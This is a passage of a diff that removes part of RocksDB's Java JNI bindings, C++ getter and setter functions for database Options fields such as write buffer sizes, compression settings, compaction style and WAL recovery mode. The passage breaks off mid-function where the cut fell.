-void Java_org_rocksdb_Options_setAdviseRandomOnOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean advise_random_on_open) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->advise_random_on_open =
-      static_cast<bool>(advise_random_on_open);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDbWriteBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setDbWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jdb_write_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->db_write_buffer_size = static_cast<size_t>(jdb_write_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    dbWriteBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_dbWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->db_write_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAccessHintOnCompactionStart
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setAccessHintOnCompactionStart(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jaccess_hint_value) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->access_hint_on_compaction_start =
-      rocksdb::AccessHintJni::toCppAccessHint(jaccess_hint_value);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    accessHintOnCompactionStart
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_accessHintOnCompactionStart(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb::AccessHintJni::toJavaAccessHint(
-      opt->access_hint_on_compaction_start);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setNewTableReaderForCompactionInputs
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setNewTableReaderForCompactionInputs(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jnew_table_reader_for_compaction_inputs) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->new_table_reader_for_compaction_inputs =
-      static_cast<bool>(jnew_table_reader_for_compaction_inputs);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    newTableReaderForCompactionInputs
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_newTableReaderForCompactionInputs(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<bool>(opt->new_table_reader_for_compaction_inputs);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompactionReadaheadSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setCompactionReadaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jcompaction_readahead_size) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->compaction_readahead_size =
-      static_cast<size_t>(jcompaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    compactionReadaheadSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_compactionReadaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->compaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setRandomAccessMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setRandomAccessMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jrandom_access_max_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->random_access_max_buffer_size =
-      static_cast<size_t>(jrandom_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    randomAccessMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_randomAccessMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->random_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWritableFileMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWritableFileMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jwritable_file_max_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->writable_file_max_buffer_size =
-      static_cast<size_t>(jwritable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    writableFileMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_writableFileMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->writable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    useAdaptiveMutex
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_useAdaptiveMutex(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->use_adaptive_mutex;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setUseAdaptiveMutex
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setUseAdaptiveMutex(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean use_adaptive_mutex) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->use_adaptive_mutex =
-      static_cast<bool>(use_adaptive_mutex);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    bytesPerSync
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_bytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->bytes_per_sync;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setBytesPerSync
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong bytes_per_sync) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->bytes_per_sync =
-      static_cast<int64_t>(bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWalBytesPerSync
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWalBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jwal_bytes_per_sync) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->wal_bytes_per_sync =
-      static_cast<int64_t>(jwal_bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    walBytesPerSync
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_walBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->wal_bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setEnableThreadTracking
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setEnableThreadTracking(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jenable_thread_tracking) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->enable_thread_tracking = static_cast<bool>(jenable_thread_tracking);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    enableThreadTracking
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_enableThreadTracking(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->enable_thread_tracking);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDelayedWriteRate
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setDelayedWriteRate(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jdelayed_write_rate) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->delayed_write_rate = static_cast<uint64_t>(jdelayed_write_rate);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    delayedWriteRate
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_delayedWriteRate(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->delayed_write_rate);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAllowConcurrentMemtableWrite
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAllowConcurrentMemtableWrite(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      allow_concurrent_memtable_write = static_cast<bool>(allow);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    allowConcurrentMemtableWrite
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_allowConcurrentMemtableWrite(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->
-      allow_concurrent_memtable_write;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setEnableWriteThreadAdaptiveYield
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setEnableWriteThreadAdaptiveYield(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean yield) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      enable_write_thread_adaptive_yield = static_cast<bool>(yield);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    enableWriteThreadAdaptiveYield
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_enableWriteThreadAdaptiveYield(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->
-      enable_write_thread_adaptive_yield;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWriteThreadMaxYieldUsec
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWriteThreadMaxYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      write_thread_max_yield_usec = static_cast<int64_t>(max);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    writeThreadMaxYieldUsec
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_writeThreadMaxYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->
-      write_thread_max_yield_usec;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWriteThreadSlowYieldUsec
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWriteThreadSlowYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong slow) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      write_thread_slow_yield_usec = static_cast<int64_t>(slow);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    writeThreadSlowYieldUsec
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_writeThreadSlowYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->
-      write_thread_slow_yield_usec;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setSkipStatsUpdateOnDbOpen
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setSkipStatsUpdateOnDbOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jskip_stats_update_on_db_open) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->skip_stats_update_on_db_open =
-      static_cast<bool>(jskip_stats_update_on_db_open);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    skipStatsUpdateOnDbOpen
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_skipStatsUpdateOnDbOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->skip_stats_update_on_db_open);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWalRecoveryMode
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setWalRecoveryMode(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jwal_recovery_mode_value) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->wal_recovery_mode =
-      rocksdb::WALRecoveryModeJni::toCppWALRecoveryMode(
-          jwal_recovery_mode_value);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    walRecoveryMode
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_walRecoveryMode(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb::WALRecoveryModeJni::toJavaWALRecoveryMode(
-      opt->wal_recovery_mode);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAllow2pc
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAllow2pc(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_2pc) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->allow_2pc = static_cast<bool>(jallow_2pc);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    allow2pc
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_allow2pc(JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->allow_2pc);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setRowCache
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setRowCache(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrow_cache_handle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  auto* row_cache = reinterpret_cast<std::shared_ptr<rocksdb::Cache>*>(jrow_cache_handle);
-  opt->row_cache = *row_cache;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setFailIfOptionsFileError
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setFailIfOptionsFileError(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jfail_if_options_file_error) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->fail_if_options_file_error =
-      static_cast<bool>(jfail_if_options_file_error);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    failIfOptionsFileError
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_failIfOptionsFileError(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->fail_if_options_file_error);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDumpMallocStats
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setDumpMallocStats(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jdump_malloc_stats) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->dump_malloc_stats = static_cast<bool>(jdump_malloc_stats);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    dumpMallocStats
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_dumpMallocStats(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->dump_malloc_stats);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAvoidFlushDuringRecovery
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAvoidFlushDuringRecovery(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean javoid_flush_during_recovery) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->avoid_flush_during_recovery = static_cast<bool>(javoid_flush_during_recovery);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    avoidFlushDuringRecovery
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_avoidFlushDuringRecovery(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->avoid_flush_during_recovery);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAvoidFlushDuringShutdown
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAvoidFlushDuringShutdown(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean javoid_flush_during_shutdown) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->avoid_flush_during_shutdown = static_cast<bool>(javoid_flush_during_shutdown);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    avoidFlushDuringShutdown
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_avoidFlushDuringShutdown(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->avoid_flush_during_shutdown);
-}
-
-/*
- * Method:    tableFactoryName
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_Options_tableFactoryName(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  rocksdb::TableFactory* tf = opt->table_factory.get();
-
-  // Should never be nullptr.
-  // Default memtable factory is SkipListFactory
-  assert(tf);
-
-  return env->NewStringUTF(tf->Name());
-}
-
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    minWriteBufferNumberToMerge
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_minWriteBufferNumberToMerge(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->min_write_buffer_number_to_merge;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMinWriteBufferNumberToMerge
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMinWriteBufferNumberToMerge(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jmin_write_buffer_number_to_merge) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->min_write_buffer_number_to_merge =
-          static_cast<int>(jmin_write_buffer_number_to_merge);
-}
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxWriteBufferNumberToMaintain
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxWriteBufferNumberToMaintain(JNIEnv* env,
-                                                             jobject jobj,
-                                                             jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->max_write_buffer_number_to_maintain;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxWriteBufferNumberToMaintain
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxWriteBufferNumberToMaintain(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jmax_write_buffer_number_to_maintain) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->max_write_buffer_number_to_maintain =
-      static_cast<int>(jmax_write_buffer_number_to_maintain);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompressionType
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jcompression_type_value) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opts->compression = rocksdb::CompressionTypeJni::toCppCompressionType(
-      jcompression_type_value);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    compressionType
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_compressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb::CompressionTypeJni::toJavaCompressionType(
-      opts->compression);
-}
-
-/**
- * Helper method to convert a Java byte array of compression levels
- * to a C++ vector of rocksdb::CompressionType
- *
- * @param env A pointer to the Java environment
- * @param jcompression_levels A reference to a java byte array
- *     where each byte indicates a compression level
- *
- * @return A unique_ptr to the vector, or unique_ptr(nullptr) if a JNI exception occurs
- */
-std::unique_ptr<std::vector<rocksdb::CompressionType>> rocksdb_compression_vector_helper(
-    JNIEnv* env, jbyteArray jcompression_levels) {
-  jsize len = env->GetArrayLength(jcompression_levels);
-  jbyte* jcompression_level =
-      env->GetByteArrayElements(jcompression_levels, nullptr);
-  if(jcompression_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return std::unique_ptr<std::vector<rocksdb::CompressionType>>();
-  }
-
-  auto* compression_levels = new std::vector<rocksdb::CompressionType>();
-  std::unique_ptr<std::vector<rocksdb::CompressionType>> uptr_compression_levels(compression_levels);
-
-  for(jsize i = 0; i < len; i++) {
-    jbyte jcl = jcompression_level[i];
-    compression_levels->push_back(static_cast<rocksdb::CompressionType>(jcl));
-  }
-
-  env->ReleaseByteArrayElements(jcompression_levels, jcompression_level,
-      JNI_ABORT);
-
-  return uptr_compression_levels;
-}
-
-/**
- * Helper method to convert a C++ vector of rocksdb::CompressionType
- * to a Java byte array of compression levels
- *
- * @param env A pointer to the Java environment
- * @param jcompression_levels A reference to a java byte array
- *     where each byte indicates a compression level
- *
- * @return A jbytearray or nullptr if an exception occurs
- */
-jbyteArray rocksdb_compression_list_helper(JNIEnv* env,
-    std::vector<rocksdb::CompressionType> compression_levels) {
-  const size_t len = compression_levels.size();
-  jbyte* jbuf = new jbyte[len];
-
-  for (size_t i = 0; i < len; i++) {
-      jbuf[i] = compression_levels[i];
-  }
-
-  // insert in java array
-  jbyteArray jcompression_levels = env->NewByteArray(static_cast<jsize>(len));
-  if(jcompression_levels == nullptr) {
-      // exception thrown: OutOfMemoryError
-      delete [] jbuf;
-      return nullptr;
-  }
-  env->SetByteArrayRegion(jcompression_levels, 0, static_cast<jsize>(len),
-      jbuf);
-  if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jcompression_levels);
-      delete [] jbuf;
-      return nullptr;
-  }
-
-  delete [] jbuf;
-
-  return jcompression_levels;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompressionPerLevel
- * Signature: (J[B)V
- */
-void Java_org_rocksdb_Options_setCompressionPerLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jbyteArray jcompressionLevels) {
-  auto uptr_compression_levels =
-      rocksdb_compression_vector_helper(env, jcompressionLevels);
-  if(!uptr_compression_levels) {
-    // exception occurred
-    return;
-  }
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  options->compression_per_level = *(uptr_compression_levels.get());
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    compressionPerLevel
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_Options_compressionPerLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb_compression_list_helper(env,
-      options->compression_per_level);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setBottommostCompressionType
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setBottommostCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jcompression_type_value) {
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  options->bottommost_compression =
-      rocksdb::CompressionTypeJni::toCppCompressionType(
-          jcompression_type_value);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    bottommostCompressionType
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_bottommostCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb::CompressionTypeJni::toJavaCompressionType(
-      options->bottommost_compression);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompressionOptions
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setCompressionOptions(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jcompression_options_handle) {
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  auto* compression_options =
-      reinterpret_cast<rocksdb::CompressionOptions*>(jcompression_options_handle);
-  options->compression_opts = *compression_options;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompactionStyle
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setCompactionStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte compaction_style) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->compaction_style =
-      static_cast<rocksdb::CompactionStyle>(compaction_style);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    compactionStyle
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_compactionStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->compaction_style;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxTableFilesSizeFIFO
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxTableFilesSizeFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jmax_table_files_size) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->compaction_options_fifo.max_table_files_size =
-    static_cast<uint64_t>(jmax_table_files_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxTableFilesSizeFIFO
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxTableFilesSizeFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->compaction_options_fifo.max_table_files_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    numLevels
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_numLevels(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->num_levels;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setNumLevels
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setNumLevels(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jnum_levels) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->num_levels =
-      static_cast<int>(jnum_levels);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    levelZeroFileNumCompactionTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_levelZeroFileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_file_num_compaction_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevelZeroFileNumCompactionTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevelZeroFileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_file_num_compaction_trigger) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_file_num_compaction_trigger =
-          static_cast<int>(jlevel0_file_num_compaction_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    levelZeroSlowdownWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_levelZeroSlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_slowdown_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevelSlowdownWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevelZeroSlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_slowdown_writes_trigger) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_slowdown_writes_trigger =
-          static_cast<int>(jlevel0_slowdown_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    levelZeroStopWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_levelZeroStopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_stop_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevelStopWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevelZeroStopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_stop_writes_trigger) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->level0_stop_writes_trigger =
-      static_cast<int>(jlevel0_stop_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    targetFileSizeBase
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_targetFileSizeBase(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->target_file_size_base;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setTargetFileSizeBase
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setTargetFileSizeBase(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jtarget_file_size_base) {
